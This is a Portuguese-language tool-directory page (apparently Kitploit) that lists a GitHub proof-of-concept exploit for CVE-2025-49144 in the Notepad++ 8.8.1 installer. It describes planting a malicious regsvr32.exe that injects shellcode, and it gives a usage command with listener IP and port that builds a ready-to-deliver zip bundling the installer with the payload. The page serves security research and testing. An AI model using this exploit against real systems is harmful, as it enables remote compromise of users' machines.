Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Notepad-8.8.1_CVE-2025-49144 — Prova de Conceito (PoC) que explora a vulnerabilidade CVE-2025-49144 no instalador do Notepad++ 8.8.1. | Kitploit
Ferramentas/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
Geração de PayloadsExploraçãoShellcodeTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

Prova de Conceito (PoC) que explora a vulnerabilidade CVE-2025-49144 no instalador do Notepad++ 8.8.1.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
61há 1 anoAinda não revisado

CVE-2025-49144 – Exploit para Notepad++ 8.8.1

Este repositório contém uma Prova de Conceito (PoC) funcional que explora a vulnerabilidade CVE-2025-49144 no instalador do Notepad++ 8.8.1. A execução maliciosa ocorre ao colocar um binário (regsvr32.exe) no mesmo diretório do instalador vulnerável. Quando o instalador é executado, ele herda o contexto e aciona o payload.

⚠️ Aviso
Este código é estritamente para fins educacionais e de pesquisa apenas. O uso não autorizado em sistemas sem permissão explícita pode constituir violação da lei.
O autor não se responsabiliza por qualquer uso indevido ou atividade maliciosa envolvendo esta ferramenta.


🧪 Requisitos

  • Python 3.x
  • msfvenom (parte do Metasploit Framework)
  • mingw-w64 (x86_64-w64-mingw32-gcc)
  • Instalador vulnerável: npp.8.8.1.Installer.x64.exe (deve ser colocado manualmente no mesmo diretório)

⚙️ Uso

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

Exemplo:

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

Isso gerará os seguintes arquivos:

  • regsvr32.exe: executável que injeta shellcode em um processo notepad.exe remoto.
  • notepad_payload.zip: arquivo pronto para entrega contendo:
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 Demo

[Prévia da Demo]

Baixar ferramenta